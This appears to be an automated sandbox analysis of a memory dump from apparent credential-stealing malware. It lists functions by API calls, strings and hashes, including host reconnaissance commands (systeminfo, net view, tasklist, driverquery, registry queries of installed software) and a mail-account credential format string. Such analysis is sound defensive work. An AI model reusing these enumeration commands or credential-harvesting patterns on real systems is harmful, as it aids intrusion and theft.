Part of subcall function 009C888D: lstrlenW.KERNEL32(0000002C), ref: 009C8980
Part of subcall function 009C888D: lstrlenW.KERNEL32(?), ref: 009C8988
Part of subcall function 009C888D: memset.NTDLL ref: 009C89AB
Part of subcall function 009C888D: wcscpy.NTDLL ref: 009C89BD

PathFindFileNameW.SHLWAPI(00000000,00000000,*.*,?,00000000,00000000,00000000), ref: 009CB117
lstrlenW.KERNEL32(00000001,?,?,?,?,?,?,?,?,?,?,?,009B7010), ref: 009CB141

Part of subcall function 009C888D: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 009C89E3
Part of subcall function 009C888D: RtlEnterCriticalSection.NTDLL(?), ref: 009C8A18
Part of subcall function 009C888D: RtlLeaveCriticalSection.NTDLL(?), ref: 009C8A34
Part of subcall function 009C888D: FindNextFileW.KERNEL32(?,00000000), ref: 009C8A4D
Part of subcall function 009C888D: WaitForSingleObject.KERNEL32(00000000), ref: 009C8A5F
Part of subcall function 009C888D: FindClose.KERNEL32(?), ref: 009C8A74
Part of subcall function 009C888D: FindFirstFileW.KERNEL32(00000000,00000000), ref: 009C8A88
Part of subcall function 009C888D: lstrlenW.KERNEL32(0000002C), ref: 009C8AAA

LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 009CB15E
WaitForSingleObject.KERNEL32(00000000,00000000,*.*,?,00000000,00000000,00000000), ref: 009CB17F
PathFindFileNameW.SHLWAPI(0000001E,?,?,?,?,?,?,?,?,?,?,?,009B7010), ref: 009CB194

Strings

*.*, xrefs: 009CB107

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$Find$File$NamePath$CriticalFirstObjectSectionSingleWaitmemset$CloseEnterFreeLeaveLocalNextmbstowcswcscpy
String ID: *.*
API String ID: 2670873185-438819550
Opcode ID: 114110dd4dadd629d370118b0da42ef292424d3208f0f57da20c3d222ec31db8
Instruction ID: be26efa90e2a219ac785cd9dd6b332c4b5135f7ab39cd497e844c84a2d962a3a
Opcode Fuzzy Hash: 114110dd4dadd629d370118b0da42ef292424d3208f0f57da20c3d222ec31db8
Instruction Fuzzy Hash: 2E313772908205AF8B11AF64CCD5D2BBBE9EF98359F04092EF48893261DB31DD459B62

Uniqueness

Uniqueness Score: -1.00%

Function 009C45CA, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 81libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 009D247D: RtlAllocateHeap.NTDLL(00000000,00000200,009C6D11), ref: 009D2489

GetModuleHandleA.KERNEL32(4C44544E,00000020,?,009B1440,?,?,?,?,009C7689,?,?,00000000,?,00000B54), ref: 009C45EF
GetProcAddress.KERNEL32(00000000,7243775A), ref: 009C4611
GetProcAddress.KERNEL32(00000000,614D775A), ref: 009C4627
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 009C463D
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 009C4653
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 009C4669

Part of subcall function 009BE010: memset.NTDLL ref: 009BE091

Strings

t, xrefs: 009C45EF

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID: t
API String ID: 1886625739-2238339752
Opcode ID: b4c011844829193722721272cd8f9dccd5077aeabfe4a85ab5027a6bc4abe36e
Instruction ID: 2da5d14ee66bb6635c4a96e2fbb4caa491733d08dd06dbbb0f60f287978b9480
Opcode Fuzzy Hash: b4c011844829193722721272cd8f9dccd5077aeabfe4a85ab5027a6bc4abe36e
Instruction Fuzzy Hash: BE218DB1A1520AEFDB20EF69DD40F6A7BECEB45344704486AE409CB215E7B0ED49CB61

Uniqueness

Uniqueness Score: -1.00%

Function 009BAC31, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63registrymemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,?,00000000), ref: 009BAC4F
RegQueryValueExA.ADVAPI32(?,Main,00000000,747DF710,00000000,?,747DF710,00000000), ref: 009BAC74
RtlAllocateHeap.NTDLL(00000000,?), ref: 009BAC85
RegQueryValueExA.ADVAPI32(?,Main,00000000,00000000,00000000,?), ref: 009BACA0
HeapFree.KERNEL32(00000000,?), ref: 009BACBE
RegCloseKey.ADVAPI32(?), ref: 009BACC7

Strings

Main, xrefs: 009BAC6B, 009BAC70, 009BAC9C

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: HeapQueryValue$AllocateCloseFreeOpen
String ID: Main
API String ID: 170146033-521822810
Opcode ID: ac9c67e0d2c30c9ca4adedf6e6bb8a25cc19f861450710d3e05cb3675f2ba2ec
Instruction ID: b8cd5af8a1ed6c64971b3ddebd1c38e3f6048900b458ef52402486f82ede7cb7
Opcode Fuzzy Hash: ac9c67e0d2c30c9ca4adedf6e6bb8a25cc19f861450710d3e05cb3675f2ba2ec
Instruction Fuzzy Hash: 2D1102B6812108FFDB019FD5DE84CEEBBBDFB48304B10446AE501A2160E7719E84EB60

Uniqueness

Uniqueness Score: -1.00%

Function 009C798A, Relevance: 12.1, APIs: 8, Instructions: 121memoryregistrysynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 009B810A: RegCreateKeyA.ADVAPI32(80000001,06288900,?), ref: 009B811F
Part of subcall function 009B810A: lstrlen.KERNEL32(06288900,00000000,00000000,?,?,009C79A9,00000000,?), ref: 009B814D

RtlAllocateHeap.NTDLL(00000000,00000105), ref: 009C79CF
RtlAllocateHeap.NTDLL(00000000,00000105), ref: 009C79E7
HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,009B1489,009C5B4A,?,00000001), ref: 009C7A49
RtlAllocateHeap.NTDLL(00000000,?), ref: 009C7A5D
WaitForSingleObject.KERNEL32(00000000,?,00000000,?,?,?,?,?,009B1489,009C5B4A,?,00000001), ref: 009C7AAD
HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,009B1489,009C5B4A,?,00000001), ref: 009C7AD6
HeapFree.KERNEL32(00000000,009B1489,?,00000000,?,?,?,?,?,009B1489,009C5B4A,?,00000001), ref: 009C7AE6
RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,?,009B1489,009C5B4A,?,00000001), ref: 009C7AEF

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFree$CloseCreateObjectSingleWaitlstrlen
String ID:
API String ID: 3503961013-0
Opcode ID: 73af4add01ca2381cf8a15163fcbeecc2f563fdd9d41bbe69ad309b04d8f18a4
Instruction ID: d2ef838f36987157c841fb6155504ab230256f6783d8f0d797b7ac9685a6c894
Opcode Fuzzy Hash: 73af4add01ca2381cf8a15163fcbeecc2f563fdd9d41bbe69ad309b04d8f18a4
Instruction Fuzzy Hash: 0841D0B5C1A10AFFDF119FD4CC849EEBBBAFB08344F10846AE505A2260D7354A95EF61

Uniqueness

Uniqueness Score: -1.00%

Function 009CA1FF, Relevance: 12.1, APIs: 8, Instructions: 112stringtimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,009D470F), ref: 009CA215
wsprintfA.USER32 ref: 009CA23D
lstrlen.KERNEL32(?), ref: 009CA24C

Part of subcall function 009C4FB0: HeapFree.KERNEL32(00000000,00000200,009C6EB2,00000000,00000100,00000200), ref: 009C4FBC

wsprintfA.USER32 ref: 009CA28C
wsprintfA.USER32 ref: 009CA2C1
memcpy.NTDLL(00000000,?,?), ref: 009CA2CE
memcpy.NTDLL(00000008,009D83E4,00000002,00000000,?,?), ref: 009CA2E3
wsprintfA.USER32 ref: 009CA306

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: wsprintf$Timememcpy$FileFreeHeapSystemlstrlen
String ID:
API String ID: 2937943280-0
Opcode ID: 61dbc79f9435cddb4b5b8b6e66825cf26b5d95f020bd3121afd95fcd59765cc2
Instruction ID: 37707419d2ed20e0cc15046a9d269fe365800877c3bde4c07cf91269c11e6403
Opcode Fuzzy Hash: 61dbc79f9435cddb4b5b8b6e66825cf26b5d95f020bd3121afd95fcd59765cc2
Instruction Fuzzy Hash: D7415075900109EFDB00DF98DC85EAAB3FCEF48308B14446AF919D7262DB31EA45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 009BF119, Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 98memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 009C8800: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,009CBE68,00000000,?,00000000,00000000,?), ref: 009C8812
Part of subcall function 009C8800: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,009CBE68,00000000,?,00000000,00000000,?), ref: 009C882B
Part of subcall function 009C8800: GetCurrentThreadId.KERNEL32 ref: 009C8838
Part of subcall function 009C8800: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,009CBE68,00000000,?,00000000,00000000,?), ref: 009C8844
Part of subcall function 009C8800: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,009CBE68,00000000,?,00000000,00000000,?), ref: 009C8852
Part of subcall function 009C8800: lstrcpy.KERNEL32(00000000), ref: 009C8874

HeapFree.KERNEL32(00000000,00000000,reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >,00000000,?,driverquery.exe >,00000000,?,tasklist.exe /SVC >,00000000,?,nslookup 127.0.0.1 >,00000000,?,net view >,00000000), ref: 009BF209

Strings

net view >, xrefs: 009BF175
nslookup 127.0.0.1 >, xrefs: 009BF18B
driverquery.exe >, xrefs: 009BF1B7
reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >, xrefs: 009BF1CD
tasklist.exe /SVC >, xrefs: 009BF1A1
systeminfo.exe >, xrefs: 009BF15B
wmic computersystem get domain |more , xrefs: 009BF13C

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Temp$FilePathTime$CurrentFreeHeapNameSystemThreadlstrcpy
String ID: driverquery.exe >$net view >$nslookup 127.0.0.1 >$reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >$systeminfo.exe >$tasklist.exe /SVC >$wmic computersystem get domain |more
API String ID: 3485239229-3033342
Opcode ID: 5124467c6dc1e68ab207d5f65258ee85458904342d361662360f85d2c3e1fd34
Instruction ID: fcca56992716a7f426344f383bcf90990c92c489a92eec33b8fd4713bf10af24
Opcode Fuzzy Hash: 5124467c6dc1e68ab207d5f65258ee85458904342d361662360f85d2c3e1fd34
Instruction Fuzzy Hash: B2215633D49573A7863136EDCDAAF9B995C87C2FB470B067AFE10B73418A419D4091E2

Uniqueness

Uniqueness Score: -1.00%

Function 009C118D, Relevance: 12.1, APIs: 8, Instructions: 72memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,009B16BA,?,?,?,?), ref: 009C11B1
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 009C11C3
wcstombs.NTDLL ref: 009C11D1
lstrlen.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,00000001,00000001,?,009B16BA,?,?,?), ref: 009C11F5
RtlAllocateHeap.NTDLL(00000000,00000002), ref: 009C120A
mbstowcs.NTDLL ref: 009C1217
HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,009B16BA,?,?,?,?,?), ref: 009C1229
HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,009B16BA,?,?,?,?,?), ref: 009C1243

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFreelstrlen$mbstowcswcstombs
String ID:
API String ID: 316328430-0
Opcode ID: 6177c793fedef32713707f2843082db5679e105fb7cc1a35d7c38876aea583d9
Instruction ID: ed94a785de68941f31c9336f10d589ccd57e40ec71b92b219b0d6e70718c5cd3
Opcode Fuzzy Hash: 6177c793fedef32713707f2843082db5679e105fb7cc1a35d7c38876aea583d9
Instruction Fuzzy Hash: ED219831815209FFDF119FA5EC08F9B7BB9FB44350F10402ABA05E21A2DB719995EB64

Uniqueness

Uniqueness Score: -1.00%

Function 009C3E17, Relevance: 12.1, APIs: 8, Instructions: 52registryCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000040,00000000,?), ref: 009C3E23
RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 009C3E41
RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 009C3E49
DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 009C3E67
GetLastError.KERNEL32 ref: 009C3E7B
RegCloseKey.ADVAPI32(?), ref: 009C3E86
CloseHandle.KERNEL32(00000000), ref: 009C3E8D
GetLastError.KERNEL32 ref: 009C3E95

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: CloseErrorHandleLastOpen$CreateDuplicateProcess
String ID:
API String ID: 3822162776-0
Opcode ID: 30c322b9934e69f82471d61f76c317047e82246be389c65494c18a5e81dba2e8
Instruction ID: 5874dce412699d5c35ba461b32cc64f999028118922c8ae662c5958655b49c4b
Opcode Fuzzy Hash: 30c322b9934e69f82471d61f76c317047e82246be389c65494c18a5e81dba2e8
Instruction Fuzzy Hash: 89116139195209BFDB015F94DC48FAA3B6DEB48351F10C41AFA06D7161CB75CA84EB22

Uniqueness

Uniqueness Score: -1.00%

Function 009B396E, Relevance: 11.5, APIs: 9, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 4e4cf13b9588d5f832d2628a817865c56b0d80fb42f70a02aefeb56ee2c53839
Instruction ID: 9123d9fa44e13c8b0456bcb2ca517b98e9348946cfd11eb2c6248eb94020a605
Opcode Fuzzy Hash: 4e4cf13b9588d5f832d2628a817865c56b0d80fb42f70a02aefeb56ee2c53839
Instruction Fuzzy Hash: A9A10175D00219EFDF22DFE4CE45AEEBBB9EF45324F10802AE851A2160D7319E95EB11

Uniqueness

Uniqueness Score: -1.00%

Function 009BC550, Relevance: 10.6, APIs: 7, Instructions: 125memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,?,?,00000000,77E34620,?,00000001,00000001,?,009C11EE,?,?,?,?,?,00000000), ref: 009BC5A9
lstrlen.KERNEL32(?,?,?,00000000,77E34620,?,00000001,00000001,?,009C11EE,?,?,?,?,?,00000000), ref: 009BC5C7
RtlAllocateHeap.NTDLL(00000000,74786985,?), ref: 009BC5F0
memcpy.NTDLL(00000000,00000000,00000000,?,00000001,00000001,?,009C11EE,?,?,?,?,?,00000000), ref: 009BC607
HeapFree.KERNEL32(00000000,00000000), ref: 009BC61A
memcpy.NTDLL(00000000,?,?,?,00000001,00000001,?,009C11EE,?,?,?,?,?,00000000), ref: 009BC629
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00000000,77E34620,?,00000001,00000001,?,009C11EE,?,?,?), ref: 009BC68D

Part of subcall function 009C0158: RtlLeaveCriticalSection.NTDLL(?), ref: 009C01D5

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Heap$Freelstrlenmemcpy$AllocateCriticalLeaveSection
String ID:
API String ID: 1635816815-0
Opcode ID: 72405293d86dfa72cc91837feb68c2991579a7d4aa4e6a0d19412c21444f3977
Instruction ID: a571146f201976fadc0b0a6414ebf7abcb59e707c722871d5f0672e153cb0838
Opcode Fuzzy Hash: 72405293d86dfa72cc91837feb68c2991579a7d4aa4e6a0d19412c21444f3977
Instruction Fuzzy Hash: D3419FB1901219EFCF219FA8CD48FDE7BA8EF44360F148569F904A6161D7B0AE50DB90

Uniqueness

Uniqueness Score: -1.00%

Function 009BA32B, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121stringCOMMON

Download Yara Rule

APIs

GetCommandLineA.KERNEL32(?,00000000,00000000,009C154B,00000000,747DF5B0,009C7D3D,61636F4C,00000001,?,?), ref: 009BA33B
StrChrA.SHLWAPI(00000000,00000020), ref: 009BA34C

Part of subcall function 009C32D8: lstrlen.KERNEL32(?,00000000,74786980,?,009CAEA4,?), ref: 009C32E1
Part of subcall function 009C32D8: memcpy.NTDLL(00000000,?,00000000,?), ref: 009C3304
Part of subcall function 009C32D8: memset.NTDLL ref: 009C3313

ExitProcess.KERNEL32 ref: 009BA480

Part of subcall function 009C25FA: StrChrA.SHLWAPI(?,?,767FD3B0,06288D54,?,?,?,009C8517,?,00000020,06288D54,?,?,009D58C6,?,?), ref: 009C2620
Part of subcall function 009C25FA: StrTrimA.SHLWAPI(?,009DA48C,00000000,?,?,009C8517,?,00000020,06288D54,?,?,009D58C6,?,?), ref: 009C263F
Part of subcall function 009C25FA: StrChrA.SHLWAPI(?,?,?,?,009C8517,?,00000020,06288D54,?,?,009D58C6,?,?), ref: 009C2650
Part of subcall function 009C25FA: StrTrimA.SHLWAPI(00000001,009DA48C,?,?,009C8517,?,00000020,06288D54,?,?,009D58C6,?,?), ref: 009C2662

lstrcmp.KERNEL32(?,mail), ref: 009BA3A9

Part of subcall function 009C67CC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 009C67EF
Part of subcall function 009C67CC: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,0000000E,?,00000008,?,?,?,009B7010), ref: 009C6830

Strings

/C pause dll, xrefs: 009BA35A
mail, xrefs: 009BA3A2

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: HeapTrim$AllocateCommandExitFreeLineProcesslstrcmplstrlenmemcpymemset
String ID: /C pause dll$mail
API String ID: 4032499568-3657633402
Opcode ID: a3fa81b17ba466ea9ac98440d62a7cbf84aa2674be0c600299542ea3f627e30d
Instruction ID: d178d2b6a805ceaa0bfe9d6394875e72cab48eafd868397716e781e8131de70f
Opcode Fuzzy Hash: a3fa81b17ba466ea9ac98440d62a7cbf84aa2674be0c600299542ea3f627e30d
Instruction Fuzzy Hash: E3318A72618301AFD710AF70DD89AABB7EEAB84364F008D2DF595D2061EA71DD48CB13

Uniqueness

Uniqueness Score: -1.00%

Function 009BFEC9, Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 120stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000,009DD000,009D6985), ref: 009BFEEB
lstrlenW.KERNEL32(?,00000000,009DD000,009D6985), ref: 009BFEFC
lstrlenW.KERNEL32(?,00000000,009DD000,009D6985), ref: 009BFF0E
lstrlenW.KERNEL32(?,00000000,009DD000,009D6985), ref: 009BFF20
lstrlenW.KERNEL32(?,00000000,009DD000,009D6985), ref: 009BFF32
lstrlenW.KERNEL32(?,00000000,009DD000,009D6985), ref: 009BFF3E

Strings

type=%S, name=%s, address=%s, server=%s, port=%u, ssl=%s, user=%s, password=%s, xrefs: 009BFFC1

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: lstrlen
String ID: type=%S, name=%s, address=%s, server=%s, port=%u, ssl=%s, user=%s, password=%s
API String ID: 1659193697-1056788794
Opcode ID: 89582aaf6c6c1502ba3a6a1f71657af5e53020f0359d8edf29e1785890e9bde2
Instruction ID: 4a3a7e5d3012a28fa2a7a3f9dbb3ff6eeb91240f8957444843ee002f9307725c
Opcode Fuzzy Hash: 89582aaf6c6c1502ba3a6a1f71657af5e53020f0359d8edf29e1785890e9bde2
Instruction Fuzzy Hash: 5E410B71E0020AAFCB20DFA9CD94AAEB7F9BF99314B24887DE415E3211E774D9448B50

Uniqueness

Uniqueness Score: -1.00%

Function 009CFFD6, Relevance: 10.6, APIs: 7, Instructions: 108memoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 009C8800: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,009CBE68,00000000,?,00000000,00000000,?), ref: 009C8812
Part of subcall function 009C8800: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,009CBE68,00000000,?,00000000,00000000,?), ref: 009C882B
Part of subcall function 009C8800: GetCurrentThreadId.KERNEL32 ref: 009C8838
Part of subcall function 009C8800: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,009CBE68,00000000,?,00000000,00000000,?), ref: 009C8844
Part of subcall function 009C8800: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,009CBE68,00000000,?,00000000,00000000,?), ref: 009C8852
Part of subcall function 009C8800: lstrcpy.KERNEL32(00000000), ref: 009C8874

StrChrA.SHLWAPI(?,0000002C,00003219), ref: 009D001C
StrTrimA.SHLWAPI(?,20000920), ref: 009D0039
StrTrimA.SHLWAPI(?,0A0D0920,?,?,00000001), ref: 009D00A2
HeapFree.KERNEL32(00000000,00000000,?,?,00000001), ref: 009D00C3
DeleteFileA.KERNEL32(?,00003219), ref: 009D00E2
HeapFree.KERNEL32(00000000,?), ref: 009D00F1
HeapFree.KERNEL32(00000000,?,00003219), ref: 009D0109

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: FileFreeHeapTemp$PathTimeTrim$CurrentDeleteNameSystemThreadlstrcpy
String ID:
API String ID: 1078934163-0
Opcode ID: 93b28f6e675acd3247ef072b45bf0a3fb7b729382aa7ad59fd8707682811a02c
Instruction ID: ebe0c4b427857821df6a49290f7f5befdf7a3b8d856e09ca176b8914a747b249
Opcode Fuzzy Hash: 93b28f6e675acd3247ef072b45bf0a3fb7b729382aa7ad59fd8707682811a02c
Instruction Fuzzy Hash: 2B31F03219A201AFE311DB54DC04FABB7ACEF84740F044456F644E72A1D7A0ED85D7A6

Uniqueness

Uniqueness Score: -1.00%

Function 009C7034, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 95memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000007), ref: 009C70B6
lstrcpy.KERNEL32(00000000,grabs=), ref: 009C70C8
lstrcpyn.KERNEL32(00000006,00000000,00000001,?,?,?,?,?,00000000,00000000,?), ref: 009C70D5
lstrlen.KERNEL32(grabs=,?,?,?,?,?,00000000,00000000,?), ref: 009C70E7
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000,00000000), ref: 009C7118

Strings

grabs=, xrefs: 009C70C2, 009C70E2

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFreelstrcpylstrcpynlstrlen
String ID: grabs=
API String ID: 2734445380-3012740322
Opcode ID: 6f347167748b9fea00475c4d610eace6d14a6e414f2ff8548ea30cb1b40b906b
Instruction ID: 5aa993b243d956f8614ce5b042857857272b19320ce847b2a5985e9a09b473c0
Opcode Fuzzy Hash: 6f347167748b9fea00475c4d610eace6d14a6e414f2ff8548ea30cb1b40b906b
Instruction Fuzzy Hash: 06318732944209BBCB119F95CC89FEFBBB8EB44360F048429F81592211EB749A55DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 009C24F1, Relevance: 10.6, APIs: 7, Instructions: 93fileCOMMON

Download Yara Rule

APIs

Part of subcall function 009C9695: GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,009C2509,?,?,00000000), ref: 009C96A1
Part of subcall function 009C9695: _aulldiv.NTDLL(?,00000000,54D38000,00000192), ref: 009C96B7
Part of subcall function 009C9695: _snwprintf.NTDLL ref: 009C96DC
Part of subcall function 009C9695: CreateFileMappingW.KERNEL32(000000FF,009DE0D4,00000004,00000000,00001000,?,?,?,00000000,54D38000,00000192), ref: 009C96F8
Part of subcall function 009C9695: GetLastError.KERNEL32(?,?,00000000,54D38000,00000192,?,?,?,?,?,?,?,?,?,009C2509,?), ref: 009C970A
Part of subcall function 009C9695: CloseHandle.KERNEL32(00000000,?,?,00000000,54D38000,00000192,?,?,?,?,?,?,?,?,?,009C2509), ref: 009C9742

UnmapViewOfFile.KERNEL32(?,?,?,00000000,00000001,?,00000000), ref: 009C2528
CloseHandle.KERNEL32(?), ref: 009C2531
Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 009C2551
Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 009C2577
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,009D17C0,?), ref: 009C25B0
GetLastError.KERNEL32(009CA098,00000000,00000000), ref: 009C25DF
CloseHandle.KERNEL32(00000000,009CA098,00000000,00000000), ref: 009C25EF

Part of subcall function 009C7854: lstrlenW.KERNEL32(004F0053,System,00000000,00000000,?,?,009BF7B7,004F0053,00000000), ref: 009C7860
Part of subcall function 009C7854: memcpy.NTDLL(00000000,004F0053,00000000,00000002,?,?,009BF7B7,004F0053,00000000), ref: 009C7888
Part of subcall function 009C7854: memset.NTDLL ref: 009C789A

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Wow64$CloseFileHandle$EnableErrorLastRedirectionTime$CreateEventMappingSystemUnmapView_aulldiv_snwprintflstrlenmemcpymemset
String ID:
API String ID: 3181697882-0
Opcode ID: c9530a48ca31e84e1804b3bd1a4561ce977b7eefebdd1171ea0a2ef9f6661abc
Instruction ID: 2704950aae2bf1633790b575b8adc51326f2ebe9b370a10c163e7cdc6e924f23
Opcode Fuzzy Hash: c9530a48ca31e84e1804b3bd1a4561ce977b7eefebdd1171ea0a2ef9f6661abc
Instruction Fuzzy Hash: 46312172E99344ABEB00EBA4DC48FAF77B8EF84314F10006AF801D7190DB349A45EB52

Uniqueness

Uniqueness Score: -1.00%

Function 009B94B4, Relevance: 10.6, APIs: 7, Instructions: 89memorystringpipeCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000000,00000000,74785520,?,?,?,009B1647,0000010D,00000000,00000000), ref: 009B94E4
RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 009B94FA
memcpy.NTDLL(00000010,?,00000000,?,?,?,009B1647,0000010D), ref: 009B9530
memcpy.NTDLL(00000010,00000000,009B1647,?,?,?,009B1647), ref: 009B954B
CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000119,00000001), ref: 009B9569
GetLastError.KERNEL32(?,?,?,009B1647), ref: 009B9573
HeapFree.KERNEL32(00000000,00000000,?,?,?,009B1647), ref: 009B9599

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Heapmemcpy$AllocateCallErrorFreeLastNamedPipelstrlen
String ID:
API String ID: 2237239663-0
Opcode ID: 7b8812cbde29ef730f3475f7f378877fc67df920d89e61b80366dcf57dc2bf12
Instruction ID: 3a4fa1968d14d606654c8bdfe85d6b43573d6900aff155ff91d0bbd8467657eb
Opcode Fuzzy Hash: 7b8812cbde29ef730f3475f7f378877fc67df920d89e61b80366dcf57dc2bf12
Instruction Fuzzy Hash: 1731D175951209EFCB21CFA9DD44ADB7BB8FB44320F00442AFE05D2211D674DA89EB60

Uniqueness

Uniqueness Score: -1.00%

Function 009CABAA, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 85memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 009CB8FB: RtlEnterCriticalSection.NTDLL(009DE268), ref: 009CB903
Part of subcall function 009CB8FB: RtlLeaveCriticalSection.NTDLL(009DE268), ref: 009CB918
Part of subcall function 009CB8FB: InterlockedIncrement.KERNEL32(0000001C), ref: 009CB931

RtlAllocateHeap.NTDLL(00000000,?,Blocked), ref: 009CABDA
memcpy.NTDLL(00000000,?,?,?,00000000,?,?,?,?,?,?,?,009BAF7F,?,00000000), ref: 009CABEB
lstrcmpi.KERNEL32(00000002,?), ref: 009CAC31
memcpy.NTDLL(00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,009BAF7F,?,00000000), ref: 009CAC45
HeapFree.KERNEL32(00000000,00000000,Blocked,00000000,?,00000000,?,?,?,?,?,?,?,009BAF7F,?,00000000), ref: 009CAC84

Strings

Blocked, xrefs: 009CABB3, 009CAC68

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: CriticalHeapSectionmemcpy$AllocateEnterFreeIncrementInterlockedLeavelstrcmpi
String ID: Blocked
API String ID: 733514052-367579676
Opcode ID: ced4a1b1c72748c95909976816aeccb03df79de874f0d21626c2282a5231ca15
